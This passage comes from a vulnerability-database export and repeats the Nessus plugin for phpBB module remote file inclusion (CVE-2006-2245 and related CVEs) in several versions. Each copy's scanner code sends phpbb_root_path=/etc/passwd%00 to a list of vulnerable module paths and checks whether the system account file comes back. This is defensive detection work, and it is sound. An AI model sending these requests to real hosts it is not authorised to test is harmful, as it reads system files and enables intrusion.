"eb7c1eabb2baa803f2635d2ba4792d3f", "key": "pluginID"}, {"hash": "69db04a1c80dd4a176e4f3d53561e805", "key": "cvelist"}, {"hash": "6249051a0279d3205c62b5abbee8dab7", "key": "modified"}, {"hash": "b8ec7988b9627a83f1d82122e582413e", "key": "description"}, {"hash": "e1c545920cd6605d0ceb58e4018cb510", "key": "sourceData"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "8b5dc20b319b47100bd63d45b155e50c", "key": "published"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "6775ceea39a7459ac555a07fd9b6f1d3", "key": "references"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "9acce4448de96d820472fbc896512e35", "key": "href"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=21323", "id": "PHPBB_AUCTION_PHPBB_ROOT_PATH_FILE_INCLUDE.NASL", "lastseen": "2016-11-02T21:26:13", "modified": "2016-11-02T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.2", "pluginID": "21323", "published": "2006-05-04T00:00:00", "references": ["http://www.securityfocus.com/archive/1/479997/30/0/threaded", "http://www.nessus.org/u?9640ab6a", "http://www.phpbb.com/phpBB/viewtopic.php?p=2504370&highlight=#2504370", "http://www.phpbb2.de/ftopic45218.html", "http://seclists.org/bugtraq/2006/Oct/209", "http://www.securityfocus.com/archive/1/452012/30/0/threaded"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21323);\n script_version(\"$Revision: 1.36 $\");\n\n script_cve_id(\n \"CVE-2006-2245\",\n \"CVE-2006-5301\",\n \"CVE-2006-5306\",\n \"CVE-2006-5390\",\n \"CVE-2006-5418\",\n \"CVE-2006-7090\",\n \"CVE-2006-7100\",\n \"CVE-2006-7147\",\n \"CVE-2007-5009\",\n \"CVE-2007-5100\"\n );\n script_bugtraq_id(\n 17822, \n 20484, \n 20485, \n 20493, \n 20501, \n 20518, \n 20525, \n 20558, \n 20571, \n 21171, \n 25737, \n 25776\n );\n script_osvdb_id(\n 25263,\n 29711,\n 29712,\n 29713,\n 29714,\n 29734,\n 29751,\n 31029,\n 35449,\n 35450,\n 38265,\n 38723,\n 38724,\n 38725\n );\n script_xref(name:\"EDB-ID\", value:\"2483\");\n script_xref(name:\"EDB-ID\", value:\"2522\");\n script_xref(name:\"EDB-ID\", value:\"2525\");\n script_xref(name:\"EDB-ID\", value:\"2533\");\n script_xref(name:\"EDB-ID\", value:\"2538\");\n\n script_name(english:\"phpBB Multiple Module phpbb_root_path Parameter Remote File Inclusion\");\n script_summary(english:\"Tries to read a local file using phpBB modules\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is prone to\nremote file include attacks.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host contains a third-party module for phpBB. \n\nThe version of at least one such component or module installed on the\nremote host fails to sanitize input to the 'phpbb_root_path' parameter\nbefore using it to include PHP code. Provided PHP's\n'register_globals' setting is enabled, an unauthenticated attacker may\nbe able to exploit these flaws to view arbitrary files on the remote\nhost or to execute arbitrary PHP code, possibly taken from third-party\nhosts.\" );\n # http://web.archive.org/web/20070527141033/http://pridels.blogspot.com/2006/05/phpbb-auction-mod-remote-file.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9640ab6a\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/bugtraq/2006/Oct/209\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpbb.com/phpBB/viewtopic.php?p=2504370&highlight=#2504370\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/452012/30/0/threaded\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/479997/30/0/threaded\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpbb2.de/ftopic45218.html\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Disable PHP's 'register_globals' setting or contact the product's\nauthor to see if an upgrade exists.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/05/04\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2006/05/03\");\n script_cvs_date(\"$Date: 2016/11/02 14:37:08 $\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:phpbb_group:phpbb-auction\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2016 Tenable Network Security, Inc.\");\n\n script_dependencies(\"phpbb_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/phpBB\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Vulnerable scripts.\n# - modules\nnmods = 0;\nmod = make_array();\n# - ACP User Registration\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Admin User Viewed Posts Tracker\nmod[nmods++] = \"/includes/functions_user_viewed_posts.php\";\n# - AI chat (included in PlusXL)\nmod[nmods++] = \"/mods/iai/includes/constants.php\";\n# - Import Tools - Members\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Insert User\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Journals System\nmod[nmods++] = \"/includes/journals_delete.php\";\nmod[nmods++] = \"/includes/journals_edit.php\";\nmod[nmods++] = \"/includes/journals_post.php\";\n# - phpBB auction\nmod[nmods++] = \"/auction/auction_common.php\";\n# - phpBB Search Engine Indexer\nmod[nmods++] = \"/includes/archive/archive_topic.php\";\n# - phpBB Security\nmod[nmods++] = \"/includes/phpbb_security.php\";\n# - phpBB2 Plus (not really a mod)\nmod[nmods++] = \"/language/lang_german/lang_main_album.php\";\nmod[nmods++] = \"/language/lang_german/lang_admin_album.php\";\nmod[nmods++] = \"/language/lang_english/lang_main_album.php\";\nmod[nmods++] = \"/language/lang_english/lang_admin_album.php\";\n# - PlusXL itself\nmod[nmods++] = \"/includes/functions.php\";\n# - SpamBlockerMod\nmod[nmods++] = \"/includes/antispam.php\";\n\n\ninfo = \"\";\ncontents = \"\";\n\n\n# Test an install.\ninstall = get_kb_item(string(\"www/\", port, \"/phpBB\"));\nif (isnull(install)) exit(0);\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!isnull(matches)) {\n dir = matches[2];\n\n # Try to exploit the flaw to read a file.\n file = \"/etc/passwd%00\";\n for (i=0; i<nmods; i++)\n {\n r = http_send_recv3(method:\"GET\", \n item:string(\n dir, mod[i], \"?\",\n \"phpbb_root_path=\", file\n ), \n port:port\n );\n if (isnull(r)) exit(0);\n res = r[2];\n\n # There's a problem if...\n if (\n # there's an entry for root or...\n egrep(pattern:\"root:.*:0:[01]:\", string:res) ||\n # we get an error saying \"failed to open stream\".\n egrep(pattern:\"main\$/etc/passwd\\\\0.+ failed to open stream\", string:res) ||\n # we get an error claiming the file doesn't exist or...\n egrep(pattern:\"main\\(/etc/passwd\$.*: failed to open stream: No such file or directory\", string:res) ||\n # we get an error about open_basedir restriction.\n egrep(pattern:\"main.+ open_basedir restriction in effect. File\\(/etc/passwd\", string:res)\n )\n {\n info = info +\n \" \" + dir + mod[i] + '\\n';\n\n if (!contents && egrep(string:res, pattern:\"root:.*:0:[01]:\"))\n contents = res - strstr(res, \"<br\");\n\n if (!thorough_tests) break;\n }\n }\n}\n\nif (info)\n{\n if (contents)\n info = string(\n info,\n \"\\n\",\n \"And here are the contents of the file '/etc/passwd' that Nessus\\n\",\n \"was able to read from the remote host :\\n\",\n \"\\n\",\n contents\n );\n\n report = string(\n \"The following scripts(s) are vulnerable :\\n\",\n \"\\n\",\n info\n );\n\n security_warning(port:port, extra:report);\n}\n", "title": "phpBB Multiple Module phpbb_root_path Parameter Remote File Inclusion", "type": "nessus", "viewCount": 0}, "differentElements": ["references", "modified", "sourceData"], "edition": 2, "lastseen": "2016-11-02T21:26:13"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:phpbb_group:phpbb-auction"], "cvelist": ["CVE-2006-7090", "CVE-2006-5301", "CVE-2006-5418", "CVE-2006-7100", "CVE-2007-5009", "CVE-2006-5390", "CVE-2006-7147", "CVE-2006-2245", "CVE-2007-5100", "CVE-2006-5306"], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "The remote host contains a third-party module for phpBB. \n\nThe version of at least one such component or module installed on the remote host fails to sanitize input to the 'phpbb_root_path' parameter before using it to include PHP code. Provided PHP's 'register_globals' setting is enabled, an unauthenticated attacker may be able to exploit these flaws to view arbitrary files on the remote host or to execute arbitrary PHP code, possibly taken from third-party hosts.", "edition": 6, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "edd7ee8e3a8af0edb691dfe69de82b00662dc8b2240e7e72ad1340eff430eec5", "hashmap": [{"hash": "cd1acb6332b705efcfb274e39bdce0d5", "key": "title"}, {"hash": "4e9ff411278dd1e0a2396e82da16469b", "key": "modified"}, {"hash": "fed7aede4a5f01a9fc080184a2dd8da8", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "eb7c1eabb2baa803f2635d2ba4792d3f", "key": "pluginID"}, {"hash": "69db04a1c80dd4a176e4f3d53561e805", "key": "cvelist"}, {"hash": "b8ec7988b9627a83f1d82122e582413e", "key": "description"}, {"hash": "c4b485d682c254d7a96e0721a51e4986", "key": "sourceData"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "8b5dc20b319b47100bd63d45b155e50c", "key": "published"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "65920404be9df979f281f296ff035289", "key": "cpe"}, {"hash": "9acce4448de96d820472fbc896512e35", "key": "href"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=21323", "id": "PHPBB_AUCTION_PHPBB_ROOT_PATH_FILE_INCLUDE.NASL", "lastseen": "2018-07-30T14:08:21", "modified": "2018-07-24T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "21323", "published": "2006-05-04T00:00:00", "references": ["http://www.securityfocus.com/archive/1/479997/30/0/threaded", "http://www.nessus.org/u?9640ab6a", "http://www.phpbb.com/phpBB/viewtopic.php?p=2504370&highlight=#2504370", "http://www.nessus.org/u?37fd2995", "http://seclists.org/bugtraq/2006/Oct/209", "http://www.securityfocus.com/archive/1/452012/30/0/threaded"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21323);\n script_version(\"1.39\");\n\n script_cve_id(\n \"CVE-2006-2245\",\n \"CVE-2006-5301\",\n \"CVE-2006-5306\",\n \"CVE-2006-5390\",\n \"CVE-2006-5418\",\n \"CVE-2006-7090\",\n \"CVE-2006-7100\",\n \"CVE-2006-7147\",\n \"CVE-2007-5009\",\n \"CVE-2007-5100\"\n );\n script_bugtraq_id(\n 17822, \n 20484, \n 20485, \n 20493, \n 20501, \n 20518, \n 20525, \n 20558, \n 20571, \n 21171, \n 25737, \n 25776\n );\n script_xref(name:\"EDB-ID\", value:\"2483\");\n script_xref(name:\"EDB-ID\", value:\"2522\");\n script_xref(name:\"EDB-ID\", value:\"2525\");\n script_xref(name:\"EDB-ID\", value:\"2533\");\n script_xref(name:\"EDB-ID\", value:\"2538\");\n\n script_name(english:\"phpBB Multiple Module phpbb_root_path Parameter Remote File Inclusion\");\n script_summary(english:\"Tries to read a local file using phpBB modules\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is prone to\nremote file include attacks.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host contains a third-party module for phpBB. \n\nThe version of at least one such component or module installed on the\nremote host fails to sanitize input to the 'phpbb_root_path' parameter\nbefore using it to include PHP code. Provided PHP's\n'register_globals' setting is enabled, an unauthenticated attacker may\nbe able to exploit these flaws to view arbitrary files on the remote\nhost or to execute arbitrary PHP code, possibly taken from third-party\nhosts.\" );\n # http://web.archive.org/web/20070527141033/http://pridels.blogspot.com/2006/05/phpbb-auction-mod-remote-file.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9640ab6a\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/bugtraq/2006/Oct/209\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpbb.com/phpBB/viewtopic.php?p=2504370&highlight=#2504370\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/452012/30/0/threaded\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/479997/30/0/threaded\" );\n # https://web.archive.org/web/20160820141912/http://www.phpbb2.de/ftopic45218.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?37fd2995\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Disable PHP's 'register_globals' setting or contact the product's\nauthor to see if an upgrade exists.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/05/04\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2006/05/03\");\n script_cvs_date(\"Date: 2018/07/24 18:56:11\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:phpbb_group:phpbb-auction\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"phpbb_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/phpBB\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Vulnerable scripts.\n# - modules\nnmods = 0;\nmod = make_array();\n# - ACP User Registration\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Admin User Viewed Posts Tracker\nmod[nmods++] = \"/includes/functions_user_viewed_posts.php\";\n# - AI chat (included in PlusXL)\nmod[nmods++] = \"/mods/iai/includes/constants.php\";\n# - Import Tools - Members\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Insert User\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Journals System\nmod[nmods++] = \"/includes/journals_delete.php\";\nmod[nmods++] = \"/includes/journals_edit.php\";\nmod[nmods++] = \"/includes/journals_post.php\";\n# - phpBB auction\nmod[nmods++] = \"/auction/auction_common.php\";\n# - phpBB Search Engine Indexer\nmod[nmods++] = \"/includes/archive/archive_topic.php\";\n# - phpBB Security\nmod[nmods++] = \"/includes/phpbb_security.php\";\n# - phpBB2 Plus (not really a mod)\nmod[nmods++] = \"/language/lang_german/lang_main_album.php\";\nmod[nmods++] = \"/language/lang_german/lang_admin_album.php\";\nmod[nmods++] = \"/language/lang_english/lang_main_album.php\";\nmod[nmods++] = \"/language/lang_english/lang_admin_album.php\";\n# - PlusXL itself\nmod[nmods++] = \"/includes/functions.php\";\n# - SpamBlockerMod\nmod[nmods++] = \"/includes/antispam.php\";\n\n\ninfo = \"\";\ncontents = \"\";\n\n\n# Test an install.\ninstall = get_kb_item(string(\"www/\", port, \"/phpBB\"));\nif (isnull(install)) exit(0);\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!isnull(matches)) {\n dir = matches[2];\n\n # Try to exploit the flaw to read a file.\n file = \"/etc/passwd%00\";\n for (i=0; i<nmods; i++)\n {\n r = http_send_recv3(method:\"GET\", \n item:string(\n dir, mod[i], \"?\",\n \"phpbb_root_path=\", file\n ), \n port:port\n );\n if (isnull(r)) exit(0);\n res = r[2];\n\n # There's a problem if...\n if (\n # there's an entry for root or...\n egrep(pattern:\"root:.*:0:[01]:\", string:res) ||\n # we get an error saying \"failed to open stream\".\n egrep(pattern:\"main\$/etc/passwd\\\\0.+ failed to open stream\", string:res) ||\n # we get an error claiming the file doesn't exist or...\n egrep(pattern:\"main\\(/etc/passwd\$.*: failed to open stream: No such file or directory\", string:res) ||\n # we get an error about open_basedir restriction.\n egrep(pattern:\"main.+ open_basedir restriction in effect. File\\(/etc/passwd\", string:res)\n )\n {\n info = info +\n \" \" + dir + mod[i] + '\\n';\n\n if (!contents && egrep(string:res, pattern:\"root:.*:0:[01]:\"))\n contents = res - strstr(res, \"<br\");\n\n if (!thorough_tests) break;\n }\n }\n}\n\nif (info)\n{\n if (contents)\n {\n contents = data_protection::redact_etc_passwd(output:contents);\n info = string(\n info,\n \"\\n\",\n \"And here are the contents of the file '/etc/passwd' that Nessus\\n\",\n \"was able to read from the remote host :\\n\",\n \"\\n\",\n contents\n );\n }\n report = string(\n \"The following scripts(s) are vulnerable :\\n\",\n \"\\n\",\n info\n );\n\n security_warning(port:port, extra:report);\n}\n", "title": "phpBB Multiple Module phpbb_root_path Parameter Remote File Inclusion", "type": "nessus", "viewCount": 0}, "differentElements": ["cvss"], "edition": 6, "lastseen": "2018-07-30T14:08:21"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:phpbb_group:phpbb-auction"], "cvelist": ["CVE-2006-7090", "CVE-2006-5301", "CVE-2006-5418", "CVE-2006-7100", "CVE-2007-5009", "CVE-2006-5390", "CVE-2006-7147", "CVE-2006-2245", "CVE-2007-5100", "CVE-2006-5306"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "The remote host contains a third-party module for phpBB. \n\nThe version of at least one such component or module installed on the remote host fails to sanitize input to the 'phpbb_root_path' parameter before using it to include PHP code. Provided PHP's 'register_globals' setting is enabled, an unauthenticated attacker may be able to exploit these flaws to view arbitrary files on the remote host or to execute arbitrary PHP code, possibly taken from third-party hosts.", "edition": 7, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "fc5d8f4f63a25cc6ab6c229130a861452a7855a979971b2d282661d17de77ca5", "hashmap": [{"hash": "cd1acb6332b705efcfb274e39bdce0d5", "key": "title"}, {"hash": "4e9ff411278dd1e0a2396e82da16469b", "key": "modified"}, {"hash": "fed7aede4a5f01a9fc080184a2dd8da8", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "eb7c1eabb2baa803f2635d2ba4792d3f", "key": "pluginID"}, {"hash": "69db04a1c80dd4a176e4f3d53561e805", "key": "cvelist"}, {"hash": "b8ec7988b9627a83f1d82122e582413e", "key": "description"}, {"hash": "c4b485d682c254d7a96e0721a51e4986", "key": "sourceData"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "8b5dc20b319b47100bd63d45b155e50c", "key": "published"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "65920404be9df979f281f296ff035289", "key": "cpe"}, {"hash": "9acce4448de96d820472fbc896512e35", "key": "href"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=21323", "id": "PHPBB_AUCTION_PHPBB_ROOT_PATH_FILE_INCLUDE.NASL", "lastseen": "2018-08-30T19:49:30", "modified": "2018-07-24T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "21323", "published": "2006-05-04T00:00:00", "references": ["http://www.securityfocus.com/archive/1/479997/30/0/threaded", "http://www.nessus.org/u?9640ab6a", "http://www.phpbb.com/phpBB/viewtopic.php?p=2504370&highlight=#2504370", "http://www.nessus.org/u?37fd2995", "http://seclists.org/bugtraq/2006/Oct/209", "http://www.securityfocus.com/archive/1/452012/30/0/threaded"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21323);\n script_version(\"1.39\");\n\n script_cve_id(\n \"CVE-2006-2245\",\n \"CVE-2006-5301\",\n \"CVE-2006-5306\",\n \"CVE-2006-5390\",\n \"CVE-2006-5418\",\n \"CVE-2006-7090\",\n \"CVE-2006-7100\",\n \"CVE-2006-7147\",\n \"CVE-2007-5009\",\n \"CVE-2007-5100\"\n );\n script_bugtraq_id(\n 17822, \n 20484, \n 20485, \n 20493, \n 20501, \n 20518, \n 20525, \n 20558, \n 20571, \n 21171, \n 25737, \n 25776\n );\n script_xref(name:\"EDB-ID\", value:\"2483\");\n script_xref(name:\"EDB-ID\", value:\"2522\");\n script_xref(name:\"EDB-ID\", value:\"2525\");\n script_xref(name:\"EDB-ID\", value:\"2533\");\n script_xref(name:\"EDB-ID\", value:\"2538\");\n\n script_name(english:\"phpBB Multiple Module phpbb_root_path Parameter Remote File Inclusion\");\n script_summary(english:\"Tries to read a local file using phpBB modules\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is prone to\nremote file include attacks.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host contains a third-party module for phpBB. \n\nThe version of at least one such component or module installed on the\nremote host fails to sanitize input to the 'phpbb_root_path' parameter\nbefore using it to include PHP code. Provided PHP's\n'register_globals' setting is enabled, an unauthenticated attacker may\nbe able to exploit these flaws to view arbitrary files on the remote\nhost or to execute arbitrary PHP code, possibly taken from third-party\nhosts.\" );\n # http://web.archive.org/web/20070527141033/http://pridels.blogspot.com/2006/05/phpbb-auction-mod-remote-file.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9640ab6a\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/bugtraq/2006/Oct/209\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpbb.com/phpBB/viewtopic.php?p=2504370&highlight=#2504370\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/452012/30/0/threaded\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/479997/30/0/threaded\" );\n # https://web.archive.org/web/20160820141912/http://www.phpbb2.de/ftopic45218.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?37fd2995\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Disable PHP's 'register_globals' setting or contact the product's\nauthor to see if an upgrade exists.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/05/04\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2006/05/03\");\n script_cvs_date(\"Date: 2018/07/24 18:56:11\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:phpbb_group:phpbb-auction\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"phpbb_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/phpBB\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Vulnerable scripts.\n# - modules\nnmods = 0;\nmod = make_array();\n# - ACP User Registration\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Admin User Viewed Posts Tracker\nmod[nmods++] = \"/includes/functions_user_viewed_posts.php\";\n# - AI chat (included in PlusXL)\nmod[nmods++] = \"/mods/iai/includes/constants.php\";\n# - Import Tools - Members\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Insert User\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Journals System\nmod[nmods++] = \"/includes/journals_delete.php\";\nmod[nmods++] = \"/includes/journals_edit.php\";\nmod[nmods++] = \"/includes/journals_post.php\";\n# - phpBB auction\nmod[nmods++] = \"/auction/auction_common.php\";\n# - phpBB Search Engine Indexer\nmod[nmods++] = \"/includes/archive/archive_topic.php\";\n# - phpBB Security\nmod[nmods++] = \"/includes/phpbb_security.php\";\n# - phpBB2 Plus (not really a mod)\nmod[nmods++] = \"/language/lang_german/lang_main_album.php\";\nmod[nmods++] = \"/language/lang_german/lang_admin_album.php\";\nmod[nmods++] = \"/language/lang_english/lang_main_album.php\";\nmod[nmods++] = \"/language/lang_english/lang_admin_album.php\";\n# - PlusXL itself\nmod[nmods++] = \"/includes/functions.php\";\n# - SpamBlockerMod\nmod[nmods++] = \"/includes/antispam.php\";\n\n\ninfo = \"\";\ncontents = \"\";\n\n\n# Test an install.\ninstall = get_kb_item(string(\"www/\", port, \"/phpBB\"));\nif (isnull(install)) exit(0);\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!isnull(matches)) {\n dir = matches[2];\n\n # Try to exploit the flaw to read a file.\n file = \"/etc/passwd%00\";\n for (i=0; i<nmods; i++)\n {\n r = http_send_recv3(method:\"GET\", \n item:string(\n dir, mod[i], \"?\",\n \"phpbb_root_path=\", file\n ), \n port:port\n );\n if (isnull(r)) exit(0);\n res = r[2];\n\n # There's a problem if...\n if (\n # there's an entry for root or...\n egrep(pattern:\"root:.*:0:[01]:\", string:res) ||\n # we get an error saying \"failed to open stream\".\n egrep(pattern:\"main\$/etc/passwd\\\\0.+ failed to open stream\", string:res) ||\n # we get an error claiming the file doesn't exist or...\n egrep(pattern:\"main\\(/etc/passwd\$.*: failed to open stream: No such file or directory\", string:res) ||\n # we get an error about open_basedir restriction.\n egrep(pattern:\"main.+ open_basedir restriction in effect. File\\(/etc/passwd\", string:res)\n )\n {\n info = info +\n \" \" + dir + mod[i] + '\\n';\n\n if (!contents && egrep(string:res, pattern:\"root:.*:0:[01]:\"))\n contents = res - strstr(res, \"<br\");\n\n if (!thorough_tests) break;\n }\n }\n}\n\nif (info)\n{\n if (contents)\n {\n contents = data_protection::redact_etc_passwd(output:contents);\n info = string(\n info,\n \"\\n\",\n \"And here are the contents of the file '/etc/passwd' that Nessus\\n\",\n \"was able to read from the remote host :\\n\",\n \"\\n\",\n contents\n );\n }\n report = string(\n \"The following scripts(s) are vulnerable :\\n\",\n \"\\n\",\n info\n );\n\n security_warning(port:port, extra:report);\n}\n", "title": "phpBB Multiple Module phpbb_root_path Parameter Remote File Inclusion", "type": "nessus", "viewCount": 0}, "differentElements": ["cvss"], "edition": 7, "lastseen": "2018-08-30T19:49:30"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:phpbb_group:phpbb-auction"], "cvelist": ["CVE-2006-7090", "CVE-2006-5301", "CVE-2006-5418", "CVE-2006-7100", "CVE-2007-5009", "CVE-2006-5390", "CVE-2006-7147", "CVE-2006-2245", "CVE-2007-5100", "CVE-2006-5306"], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "The remote host contains a third-party module for phpBB. \n\nThe version of at least one such component or module installed on the remote host fails to sanitize input to the 'phpbb_root_path' parameter before using it to include PHP code. Provided PHP's 'register_globals' setting is enabled, an unauthenticated attacker may be able to exploit these flaws to view arbitrary files on the remote host or to execute arbitrary PHP code, possibly taken from third-party hosts.", "edition": 9, "enchantments": {"score": {"value": 7.5, "vector": 